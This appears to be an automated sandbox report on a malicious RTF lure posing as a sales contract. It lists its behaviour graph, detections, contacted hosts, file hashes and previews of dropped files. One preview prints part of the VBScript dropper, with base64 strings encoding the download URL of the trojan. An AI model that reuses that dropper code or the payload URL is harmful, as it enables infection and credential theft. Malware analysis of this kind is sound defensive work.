          behaviorgraph top1 signatures2 2 Behavior Graph ID: 688701 Sample: Revised sales contract for ... Startdate: 23/08/2022 Architecture: WINDOWS Score: 100 84 Snort IDS alert for network traffic 2->84 86 Malicious sample detected (through community Yara rule) 2->86 88 Antivirus detection for dropped file 2->88 90 20 other signatures 2->90 8 WINWORD.EXE 301 46 2->8         started        process3 dnsIp4 76 f0705964.xsph.ru 141.8.192.151, 49171, 49172, 80 SPRINTHOSTRU Russian Federation 8->76 58 C:\Users\user\AppData\Local\...\mum[1].exe, PE32 8->58 dropped 60 C:\Users\user\AppData\...\DRdtfhgYgeghDp .scT, data 8->60 dropped 62 C:\Users\user\AppData\Local\...\FBB61633.png, 370 8->62 dropped 108 Document exploit detected (creates forbidden files) 8->108 110 Suspicious powershell command line found 8->110 112 Tries to download and execute files (via powershell) 8->112 114 2 other signatures 8->114 13 cmd.exe 8->13         started        15 cmd.exe 8->15         started        17 cmd.exe 8->17         started        19 5 other processes 8->19 file5 signatures6 process7 dnsIp8 24 mum.exe 1 8 13->24         started        28 mum.exe 15->28         started        30 mum.exe 2 17->30         started        74 f0705964.xsph.ru 19->74 52 C:\Users\user\AppData\Roaming\mum.exe, PE32 19->52 dropped 92 Powershell drops PE file 19->92 94 Injects files into Windows application 19->94 file9 signatures10 process11 file12 54 C:\Users\user\AppData\...\RRUwFfPTEDHYrl.exe, PE32 24->54 dropped 56 C:\Users\user\AppData\Local\Temp\tmpEFF.tmp, XML 24->56 dropped 96 Antivirus detection for dropped file 24->96 98 May check the online IP address of the machine 24->98 100 Machine Learning detection for dropped file 24->100 102 Uses schtasks.exe or at.exe to add and modify task schedules 24->102 32 mum.exe 12 24->32         started        36 powershell.exe 6 24->36         started        38 schtasks.exe 24->38         started        104 Adds a directory exclusion to Windows Defender 28->104 106 Injects a PE file into a foreign processes 28->106 40 mum.exe 28->40         started        48 2 other processes 28->48 42 mum.exe 30->42         started        44 powershell.exe 30->44         started        46 schtasks.exe 30->46         started        50 2 other processes 30->50 signatures13 process14 dnsIp15 64 checkip.dyndns.com 132.226.8.169, 49173, 80 UTMEMUS United States 32->64 66 checkip.dyndns.org 32->66 68 checkip.dyndns.org 40->68 78 Tries to steal Mail credentials (via file / registry access) 40->78 80 Tries to harvest and steal ftp login credentials 40->80 82 Tries to harvest and steal browser information (history, passwords, etc) 40->82 70 193.122.130.0, 49174, 49175, 80 ORACLE-BMC-31898US United States 42->70 72 checkip.dyndns.org 42->72 signatures16

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Revised sales contract for Crosswear.rtf32%ReversingLabsScript-WScript.Exploit.Heuristic
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exe100%AviraHEUR/AGEN.1250356
          C:\Users\user\AppData\Roaming\mum.exe100%AviraHEUR/AGEN.1250356
          C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe100%AviraHEUR/AGEN.1250356
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\mum.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\RRUwFfPTEDHYrl.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exe81%ReversingLabsByteCode-MSIL.Trojan.Taskun
          SourceDetectionScannerLabelLinkDownload
          15.0.mum.exe.400000.0.unpack100%AviraTR/ATRAPS.GenDownload File
          8.0.mum.exe.11b0000.0.unpack100%AviraHEUR/AGEN.1250356Download File
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://checkip.dyndns.orgP0%URL Reputationsafe
          http://checkip.dyndns.org/0%URL Reputationsafe
          http://checkip.dyndns.org/q0%URL Reputationsafe
          http://checkip.dyndns.org0%URL Reputationsafe
          http://checkip.dyndns.com0%URL Reputationsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          f0705964.xsph.ru
          141.8.192.151
          truefalse
            high
            checkip.dyndns.com
            132.226.8.169
            truetrue
              unknown
              checkip.dyndns.org
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://f0705964.xsph.ru/mum.exefalse
                  high
                  http://checkip.dyndns.org/true
                  • URL Reputation: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  httP://f0705964.xsph.ru/mum.exepowershell.exe, 00000012.00000002.962331313.0000000000230000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://checkip.dyndns.orgPmum.exe, 0000000F.00000002.1281642701.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1282263272.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1282013934.0000000002691000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000004.00000002.914821376.000000000018E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.937210207.000000000027E000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://api.telegram.org/botmum.exe, 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        high
                        http://checkip.dyndns.org/qmum.exe, 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.piriform.com/ccleanerpowershell.exe, 00000004.00000002.914821376.000000000018E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.937210207.000000000027E000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://checkip.dyndns.orgmum.exe, 0000000F.00000002.1283209898.00000000026E8000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000000F.00000002.1281642701.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1283632776.00000000026E9000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1282263272.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1282013934.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1283300680.00000000026E6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://checkip.dyndns.commum.exe, 0000000F.00000002.1283209898.00000000026E8000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1283632776.00000000026E9000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1283300680.00000000026E6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          httP://f0705964.xsph.rupowershell.exe, 00000012.00000002.993914279.00000000035AA000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemum.exe, 00000008.00000002.962351507.0000000002752000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000000F.00000002.1281642701.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000013.00000002.995998092.0000000002941000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000013.00000002.993872041.00000000026F5000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1282263272.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001D.00000002.1050938955.00000000026F5000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001D.00000002.1052652810.000000000295C000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1282013934.0000000002691000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              httP://f0705964.xsph.ru/mum.exePEpowershell.exe, 00000009.00000002.947506272.000000000387A000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                httP://f0705964.xsph.ru/mum.exePEQpowershell.exe, 00000004.00000002.919275004.000000000364A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.993914279.00000000035AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://f0705964.xsph.rupowershell.exe, 00000004.00000002.919533921.0000000003745000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    132.226.8.169
                                    checkip.dyndns.comUnited States
                                    16989UTMEMUStrue
                                    193.122.130.0
                                    unknownUnited States
                                    31898ORACLE-BMC-31898UStrue
                                    141.8.192.151
                                    f0705964.xsph.ruRussian Federation
                                    35278SPRINTHOSTRUfalse
                                    Joe Sandbox Version:35.0.0 Citrine
                                    Analysis ID:688701
                                    Start date and time:2022-08-23 13:41:53 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 12m 10s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:Revised sales contract for Crosswear.rtf
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:38
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.expl.evad.winRTF@44/31@8/3
                                    EGA Information:
                                    • Successful, ratio: 85.7%
                                    HDC Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 91%
                                    • Number of executed functions: 444
                                    • Number of non-executed functions: 14
                                    Cookbook Comments:
                                    • Found application associated with file extension: .rtf
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Active ActiveX Object
                                    • Scroll down
                                    • Close Viewer
                                    • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                    • Execution Graph export aborted for target powershell.exe, PID 2016 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtCreateFile calls found.
                                    • Report size getting too big, too many NtEnumerateValueKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: Revised sales contract for Crosswear.rtf
                                    TimeTypeDescription
                                    13:42:21API Interceptor101x Sleep call for process: powershell.exe modified
                                    13:42:32API Interceptor1529x Sleep call for process: mum.exe modified
                                    13:42:39API Interceptor3x Sleep call for process: schtasks.exe modified
                                    13:45:01API Interceptor94x Sleep call for process: svchost.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    132.226.8.169RFQ ORDER 00226.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    purchase order.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    WvrXWRS5MZAOWYe.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    vDZsO7QUv3.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    hesap bildirimi.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    listed items.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    SecuriteInfo.com.Variant.Lazy.234727.32325.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    xXICOBtKY6NHZec.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    Attachement Specifications.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    400000.854F1E97-5DBB-4A87-A566-33D9012B05E2 pdf.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    OPTICAL-EYEWEAR 094216.xlsxGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    QmWbXqbgVW.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    Purchase Order.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    EkQDX.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    9518-Fairhaven-Dr.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    transfer sheet.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    #4rgc001.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    Order List.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    BFp9t4j5l5.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    PO_20220815.exeGet hashmaliciousBrowse
                                    • checkip.dyndns.org/
                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    checkip.dyndns.com2QeMjAv3iT.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    onnxMdZI73.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    MV GOLDEN SCHULTE.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    Attachment Details.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    RFQ ORDER 00226.exeGet hashmaliciousBrowse
                                    • 132.226.8.169
                                    ITEM LIST AND SPECIFICATION.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    purchase order.exeGet hashmaliciousBrowse
                                    • 132.226.8.169
                                    Our Purchase Order.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    ITEM LIST_5050_Pacific.exeGet hashmaliciousBrowse
                                    • 193.122.130.0
                                    Proof of payment.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    WvrXWRS5MZAOWYe.exeGet hashmaliciousBrowse
                                    • 132.226.8.169
                                    Q37UK9cUEN2GFV3.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    RevisedQuotationlist.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    RFQ ORDER 00226.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    P75lXtQzg8.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    vDZsO7QUv3.exeGet hashmaliciousBrowse
                                    • 132.226.8.169
                                    DHL DOC 74653898.pdf.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    SecuriteInfo.com.W32.AIDetectNet.01.8456.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    Inv. PAYMENT Details.xlsxGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    Inv. PAYMENT Details.jsGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    UTMEMUSonnxMdZI73.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    MV GOLDEN SCHULTE.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    Attachment Details.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    RFQ ORDER 00226.exeGet hashmaliciousBrowse
                                    • 132.226.8.169
                                    purchase order.exeGet hashmaliciousBrowse
                                    • 132.226.8.169
                                    Proof of payment.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    WvrXWRS5MZAOWYe.exeGet hashmaliciousBrowse
                                    • 132.226.8.169
                                    Q37UK9cUEN2GFV3.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    RevisedQuotationlist.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    vDZsO7QUv3.exeGet hashmaliciousBrowse
                                    • 132.226.8.169
                                    DHL DOC 74653898.pdf.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    SecuriteInfo.com.W32.AIDetectNet.01.8456.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    Inv. PAYMENT Details.xlsxGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    Inv. PAYMENT Details.jsGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    Item.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    hesap bildirimi.exeGet hashmaliciousBrowse
                                    • 132.226.8.169
                                    #U00dc#U00c7#U00dcNC#U00dc TARAF DETAYLARI.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    eudst1CZ8ygUYa7.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    cdagu21bYo.exeGet hashmaliciousBrowse
                                    • 132.226.247.73
                                    listed items.exeGet hashmaliciousBrowse
                                    • 132.226.8.169
                                    ORACLE-BMC-31898US2QeMjAv3iT.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    ITEM LIST AND SPECIFICATION.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    Our Purchase Order.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    ITEM LIST_5050_Pacific.exeGet hashmaliciousBrowse
                                    • 193.122.130.0
                                    RFQ ORDER 00226.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    P75lXtQzg8.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    RFQ REF R2100131410.pdf.exeGet hashmaliciousBrowse
                                    • 193.122.130.0
                                    PNsbHs7xzL.exeGet hashmaliciousBrowse
                                    • 193.122.130.0
                                    http://results@remax.com.au.yuyasociados.com/results@remax.com.auGet hashmaliciousBrowse
                                    • 134.70.132.2
                                    heather.albert#Ticket513473.htmGet hashmaliciousBrowse
                                    • 134.70.28.1
                                    heather.albert#Ticket513473.htmGet hashmaliciousBrowse
                                    • 134.70.28.1
                                    oZhdK4h48NNOKFW.exeGet hashmaliciousBrowse
                                    • 193.122.130.0
                                    waEROKawNm.exeGet hashmaliciousBrowse
                                    • 193.122.130.0
                                    fattura proforma.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    po063#.exeGet hashmaliciousBrowse
                                    • 193.122.6.168
                                    01-PO6QH.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    Purchase Order.exeGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    NEW ORDER.exeGet hashmaliciousBrowse
                                    • 193.122.6.168
                                    listed items.exeGet hashmaliciousBrowse
                                    • 193.122.6.168
                                    ORDER-22808.jsGet hashmaliciousBrowse
                                    • 158.101.44.242
                                    No context
                                    No context
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:downloaded
                                    Size (bytes):829952
                                    Entropy (8bit):7.980422003620349
                                    Encrypted:false
                                    SSDEEP:12288:Pu1znYPEX0k/g7Iw5O4OAA+sg7l+kwLnKsqH+OMcKDZrqlmakPDbYsu/tn1:GZY7ft/3HEKRHEZ6AbYNt
                                    MD5:06C16E9A1807F8754D73C6B77E978D02
                                    SHA1:A3B04691195895358512BCAE3658E2D10CDB2178
                                    SHA-256:1A87E22338388A438C836B8CF97E2C28074D3CC992879D330F68CA88B684F571
                                    SHA-512:4DA172D828B8AB4791E90D21FA422A12CBB09678780132822A6DD7D8107DE28615E3F1D2D575DC0A7243EC1E8E65E848C953ADD6B6867B045E20FAE3BB6801D9
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 81%
                                    IE Cache URL:http://f0705964.xsph.ru/mum.exe
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c................................. ........@.. ....................... ............@.....................................W.......\............................................................................ ............... ..H............text........ ...................... ..`.rsrc...\...........................@..@.reloc..............................@..B........................H...........9......S....`...&..........................................z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....ok...:q....(....+..(........}.........(......*................n..}.....{....,..{....oT...*..{....*.s..
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
                                    Category:dropped
                                    Size (bytes):3712
                                    Entropy (8bit):5.036280919911438
                                    Encrypted:false
                                    SSDEEP:48:PJk/UKHl3G6nj6rmbYf3LSrd/lO88e0f5aSdJ9nNk3t1fQ:Bk7Hgwj+mbYf3LSrhlOs0f5aSdHn63DI
                                    MD5:1AB0C7CF263334FE407B9A145F04AF17
                                    SHA1:A261E12D4FE34A19ECE18C761FBA882559B6F663
                                    SHA-256:B1B631666516A6C8B15B5B0722BBA0492890A51B83565FC2A7326788F2DDBB39
                                    SHA-512:CB98FACDBC943ED84D6F9EEFE62516EB6D506940D52E7A4659F367B273324B8C3622DEF90437A7F80024C74A5DF7500E81D190FBB4177335B141AAC7A63DB53B
                                    Malicious:false
                                    Preview:......@.....!.....................5...........................Segoe UI....C.......@...............-...........................A..... . ..... . ...9.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...9.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:370 sysV pure executable
                                    Category:dropped
                                    Size (bytes):262160
                                    Entropy (8bit):0.0018462035600765212
                                    Encrypted:false
                                    SSDEEP:3:mfBtjPHXdLlltFUlNlelt1tllP5:mZ8K
                                    MD5:C71A9A49CE66F4848EAD88FBBF56C45E
                                    SHA1:190C996710554261A515DD62D3CCB09CEDB0D28C
                                    SHA-256:C7F861746E0C1DB5B6BAD2F3E8DDD966FC02F088FD78F4B4AFEC726090540003
                                    SHA-512:E26925D15039DD3121035E48CC0990F3F67F62F7DE398D26E78872CBB2744FBACBCBCD72E44DBAB52274F7F85B618B210399627D30F2BCA470DC14DCC582DACF
                                    Malicious:false
                                    Preview:X.4.....`.Q.................................................j*....4.......4.....`.A.....`.A.......T.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:Composite Document File V2 Document, Cannot read section info
                                    Category:dropped
                                    Size (bytes):57344
                                    Entropy (8bit):5.702760097512595
                                    Encrypted:false
                                    SSDEEP:1536:iyzakaBa9aRaOa2ncbZxCfTyzakaBa9aRaOa2ncbZxe67:iyzakaBa9aRaOa2cNxiyzakaBa9aRaO8
                                    MD5:AEC4110BC3BCB59AE8E80C28E750DEE9
                                    SHA1:0BEF7DA2EB4C02F425DC02DF6AB959FE12BD8788
                                    SHA-256:109F30FE0C72DBCE3ED5FABF7518FBA7CC5D5F41992186402938BDC5E60B5F38
                                    SHA-512:E95EC4B0F503688906619C41AEC57BA8259E692A29084E9562F1AB632F6860A752381CE003C321AE4AB7E0949C7106D677D5506F4889CCD4798563606AA67BB9
                                    Malicious:false
                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................k.......-........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,......./...0...5...1...2...3...4...8...6...7...9...b...j...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......c...d...e...f...g...h...i...l...........m...n...................................................
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1536
                                    Entropy (8bit):1.3586208805849456
                                    Encrypted:false
                                    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbE:IiiiiiiiiifdLloZQc8++lsJe1MzD/
                                    MD5:1AA8247082CBEFF605CCB2B48FBA2746
                                    SHA1:091F719BDEBB7A84AC3EFBEAF5FA6620FE1C417A
                                    SHA-256:05FB9A4FBAE2F432CA91667BB96BD481345AE0F6781C580D81F6789C12E58586
                                    SHA-512:5FD5374A8D7BF578AAFF05D289756748FACBD4C660064B921D40C2F1AEB97560BC29D7774B67254B6BD95417620AB4FD6AEEE548B210C6B83161778ED3B2DC14
                                    Malicious:false
                                    Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1024
                                    Entropy (8bit):0.05390218305374581
                                    Encrypted:false
                                    SSDEEP:3:ol3lYdn:4Wn
                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                    Malicious:false
                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):44618
                                    Entropy (8bit):2.9166030885019487
                                    Encrypted:false
                                    SSDEEP:768:sm/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:DFia0Dqeb0nstw29rVzWSgm58F
                                    MD5:D2F63DD136743678D3DB23C29BCD88FA
                                    SHA1:2E46233C5CD9DAD02F392DC3BE42A2D618317E8F
                                    SHA-256:581E57766F7FE8EF2AEFD9CEFEC179DE9DFC8EB205DE242AF97D974E470916AC
                                    SHA-512:23FEA2C354DB8C4F3785740A0613C2887001C56695A5C8497EDBC36177B32C23C08F75A4F6D0BDB6D491AF82D3DF838F92891AE307E597D89F7C4EC60F30047E
                                    Malicious:false
                                    Preview:c.0.5.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .d.o.e.s. .n.o.t. .w.o.r.k. .i.n. .e.m.a.i.l. .P.r.e.v.i.e.w.....P.l.e.a.s.e. .d.o.w.n.l.o.a.d. .t.h.e. .d.o.c.u.m.e.n.t. .a.n.d. .c.l.i.c.k. .E.n.a.b.l.e. .E.d.i.t.i.n.g. .w.h.e.n. .o.p.e.n.i.n.g.......=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.D.R.d.t.f.h.g.Y.g.e.g.h.D.p.....s.c.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".....................................4...>...D.................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .j.W.f...CJ..OJ..QJ..U..^J..aJ.....h.CK.5..CJ..OJ..QJ..^J..aJ....h.CK.CJ..OJ..QJ..^J..aJ.
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):19921
                                    Entropy (8bit):5.7859702560472295
                                    Encrypted:false
                                    SSDEEP:384:GvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOvi2Rz6vZVUpC8Q4zF:GvOvOvOvOvOvOvOvOvOvOvOvOvOvOvOV
                                    MD5:E9B62F3D61D226EFE8D4A3FCF1C15D30
                                    SHA1:B68B646683148D27F69BC812B270F75F2E7581D3
                                    SHA-256:51807145B38F6170871EC88FB3360FEAB4DB900E83FD7EE8235AF2EB5ED1BF17
                                    SHA-512:D7A9D04536B9A89F53330B3571057234A8C62C1857583D7D51431643FA8CD9D12445A99DBD9C48039F4B5F046441F2532F04FD44B1E1BDA40B1B8C720BFE0887
                                    Malicious:true
                                    Preview:..<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2YwNzA1OTY0LnhzcGgucnUvbXVtLmV4ZQ==" 'clsyc2..yulkytjtrhtjrkdsarjky ="bXVtLmV4ZQ==" 'clsyc2..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv......
                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
